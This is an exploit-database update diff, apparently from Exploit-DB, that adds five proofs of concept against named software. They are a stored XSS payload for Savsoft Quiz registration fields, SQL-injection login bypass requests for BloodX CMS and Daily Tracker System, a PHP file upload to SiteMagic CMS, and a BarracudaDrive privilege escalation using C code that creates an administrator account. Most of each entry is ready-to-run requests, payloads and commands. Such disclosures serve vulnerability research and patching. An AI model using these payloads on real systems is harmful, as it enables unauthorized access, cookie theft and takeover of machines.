DB: 2020-09-04

5 changes to exploits/shellcodes

BarracudaDrive v6.5 - Insecure Folder Permissions
Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting
BloodX CMS 1.0 - Authentication Bypass
Daily Tracker System 1.0 - Authentication Bypass
SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)

exploits/php/webapps/48785.txt

@@ -0,0 +1,41 @@
+# Exploit Title: Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting
+# Date: 2020-09-01
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://savsoftquiz.com/
+# Software Link: https://savsoftquiz.com/web/demo.php
+# Version: 5.0
+# Tested on: Windows 10/Kali Linux
+# Contact: https://www.linkedin.com/in/hemantsolo/
+
+Stored Cross-site scripting(XSS):
+Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
+
+Attack vector:
+This vulnerability can results attacker to inject the XSS payload in User Registration section and each time admin visits the manage user section from admin panel,
+the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
+
+Vulnerable Parameters: First Name, Last Name
+1. Go to the registration page.
+2. Fill all the details  and put this payload in First and Last Name "<script>alert("OPPS")</script>"
+3. Now go to the admin panel and the XSS will be triggered.
+
+POST /savsoftquiz_v5_enterprise/index.php/login/insert_user/ HTTP/1.1
+Host: TARGET
+Connection: close
+Content-Length: 187
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: https://savsoftquiz.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://TARGET/savsoftquiz_v5_enterprise/index.php/login/registration/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: _ga=GA1.2.757300437.1598544895; _gid=GA1.2.1240991040.1598544895; ci_session=mm5q58p28e620n9im0imeildnvabkoeg
+
+email=hemantpatidar1337%40gmail.com&password=test&first_name=<script>alert("OPPS")</script>&last_name=<script>alert("OPPS")</script>&contact_no=0000000000&gid%5B%5D=1

exploits/php/webapps/48786.txt

@@ -0,0 +1,30 @@
+# Exploit Title: BloodX CMS 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-09-02
+# Exploit Author: BKpatron
+# Vendor Homepage: https://github.com/diveshlunker/BloodX
+# Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost/BloodX-master/login.php
+
+POST /BloodX-master/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 63
+Referer: http:/localhost/BloodX-master/login.php
+Cookie: PHPSESSID=97vbf440gvh0fep3iuqusaqht
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN

exploits/php/webapps/48787.txt

@@ -0,0 +1,44 @@
+# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass
+# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
+# CVE ID: CVE-2020-24193
+# Date: September 2, 2020
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
+
+# Vulnerable Source Code
+
+if(isset($_POST['login']))
+{
+$email=$_POST['email'];
+$password=md5($_POST['password']);
+$query=mysqli_query($con,"select ID from tbluser where  Email='$email' && Password='$password    ' ");
+$ret=mysqli_fetch_array($query);
+if($ret>0){
+ $_SESSION['detsuid']=$ret['ID'];
+ header('location:dashboard.php');
+}
+ else{
+ $msg="Invalid Details.";
+ }
+}
+?>
+
+
+# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
+POST /dets/index.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://172.16.65.130/dets/index.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 48
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
+Upgrade-Insecure-Requests: 1
+
+email='+or+1%3d1+--+hyd3sec&password=badPass&login=login

exploits/php/webapps/48788.txt

@@ -0,0 +1,60 @@
+# Exploit Title: SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)
+# Date: 2020-09-02
+# Exploit Author: v1n1v131r4
+# Vendor Homepage: https://sitemagic.org/
+# Software Link: https://sitemagic.org/Download.html
+# Version: 4.4.2
+# Tested on: Ubuntu 18.04
+# CVE : N/A
+# PoC: https://github.com/V1n1v131r4/Unrestricted-File-Upload-on-SiteMagic-CMS-4.4.2/blob/master/README.md
+
+
+Step 1 - Request
+
+POST /sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1
+Host: example.org
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pt-BR,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------144837887339078243581158835832
+Content-Length: 538
+Origin: example.org
+DNT: 1
+Connection: close
+Referer: http://example.org/sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
+Cookie: timezone=America/Argentina/Buenos_Aires; cookieconsent_status=dismiss; SMSESSION407f70d0a9400582=f93d614ad0046ec76e41f3613d97da59
+Upgrade-Insecure-Requests: 1
+
+-----------------------------144837887339078243581158835832
+Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="info.php"
+Content-Type: application/x-php
+
+<?php phpinfo(); ?>
+
+-----------------------------144837887339078243581158835832
+Content-Disposition: form-data; name="SMPostBackControl"
+
+
+-----------------------------144837887339078243581158835832
+Content-Disposition: form-data; name="SMRequestToken"
+
+f9f116f33c012ce5e67f52dffc7e6bc6
+-----------------------------144837887339078243581158835832--
+
+
+
+
+Step 2 - Response
+
+Status 200 OK
+Version HTTP/1.1
+Transferred 26,20 KB (25,80 KB size)
+Referrer Policy no-referrer-when-downgrade
+
+
+
+
+Step 3 - Read file uploaded
+
+http://example.org/sitemagic/files/images/info.php

exploits/windows/local/48789.txt

@@ -0,0 +1,94 @@
+# Exploit Title: BarracudaDrive v6.5 - Insecure Folder Permissions
+# Exploit Author:  Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) 
+# CVE ID: N/A
+# Date: 2020-09-01
+# Vendor Homepage: https://barracudaserver.com/
+# Software Link:   https://download.cnet.com/BarracudaDrive/3001-18506_4-10723210.html
+# Version:         v6.5
+# Tested On:       Windows 10 Pro 
+# CVSS Base Score: 8.8 | Impact Subscore: 6.0 | Exploitability Subscore: 2.0
+#     CVSS Vector: AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+#         CWE-276: Incorrect Default Permissions
+#         CWE-732: Incorrect Permission Assignment for Critical Resource
+# Vulnerability Description:
+#     Insecure Service File Permissions in bd service in Real Time Logics BarracudaDrive v6.5 
+#   allows local low-privilege attacker to escalate privileges to admin via replacing the bd.exe 
+#   file and restarting the computer where the malicious code will be executed as 'LocalSystem'
+#   on the next startup.
+
+## Insecure Folder Permission
+C:\>cacls C:\bd
+C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F
+      NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
+      BUILTIN\Users:(OI)(CI)(ID)R
+      NT AUTHORITY\Authenticated Users:(ID)C
+      NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
+
+## Insecure File/Service Permission
+C:\>cacls C:\bd\bd.exe
+C:\bd\bd.exe BUILTIN\Administrators:(ID)F
+             NT AUTHORITY\SYSTEM:(ID)F
+             BUILTIN\Users:(ID)R
+             NT AUTHORITY\Authenticated Users:(ID)C
+
+C:\>sc qc bd
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: bd
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\bd\bd.exe"
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : BarracudaDrive ( bd ) service
+        DEPENDENCIES       : Tcpip
+        SERVICE_START_NAME : LocalSystem
+
+## Local Privilege Escalation Proof of Concept
+#0.  Download & install 
+
+#1.  Create low privileged user & change to the user
+## As admin
+C:\>net user lowpriv Password123! /add
+C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
+User name                    lowpriv
+Local Group Memberships      *Users
+Global Group memberships     *None
+
+#2.  Move the Service EXE to a new name
+C:\bd>whoami
+desktop\lowpriv
+C:\bd>move bd.exe bd.service.exe
+        1 file(s) moved.
+
+#3.  Create malicious binary on kali linux
+## Add Admin User C Code
+   kali# cat addAdmin.c
+     int main(void){
+     system("net user boku mypassword /add");
+     system("net localgroup Administrators boku /add");
+     WinExec("C:\\bd\\bd.service.exe",0);
+    return 0;
+    } 
+
+## Compile Code
+   kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o bd.exe
+
+#4. Transfer created 'bd.exe' to the Windows Host 
+
+#5. Move the created 'bd.exe' binary to the 'C:\bd\' Folder
+C:\bd>move C:\Users\lowpriv\Downloads\bd.exe .
+
+#6. Check that exploit admin user doesn't exit
+C:\bd>net user boku
+The user name could not be found
+
+#6. Reboot the Computer
+C:\bd>shutdown /r
+
+#7. Login & look at that new Admin
+C:\Users\lowpriv>net user boku | findstr /i "Membership Name" | findstr /v "Full"
+User name                    boku
+Local Group Memberships      *Administrators       *Users
+Global Group memberships     *None

files_exploits.csv

@@ -11141,6 +11141,7 @@ id,file,description,date,author,type,platform,port
 48740,exploits/windows/local/48740.txt,"BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path",2020-08-10,"Daniel Bertoni",local,windows,
 48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
 48776,exploits/windows/local/48776.py,"BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH_ASLR_DEP)",2020-08-31,emalp,local,windows,
+48789,exploits/windows/local/48789.txt,"BarracudaDrive v6.5 - Insecure Folder Permissions",2020-09-03,boku,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43021,3 +43022,7 @@ id,file,description,date,author,type,platform,port
 48780,exploits/php/webapps/48780.txt,"Mara CMS 7.5 - Remote Code Execution (Authenticated)",2020-09-01,0blio_,webapps,php,
 48781,exploits/php/webapps/48781.txt,"moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)",2020-09-01,"Abdulkadir Kaya",webapps,php,
 48783,exploits/php/webapps/48783.txt,"Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)",2020-09-02,boku,webapps,php,
+48785,exploits/php/webapps/48785.txt,"Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting",2020-09-03,"Hemant Patidar",webapps,php,
+48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,
+48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
+48788,exploits/php/webapps/48788.txt,"SiteMagic CMS 4.4.2 - Arbitrary File Upload (Authenticated)",2020-09-03,V1n1v131r4,webapps,php,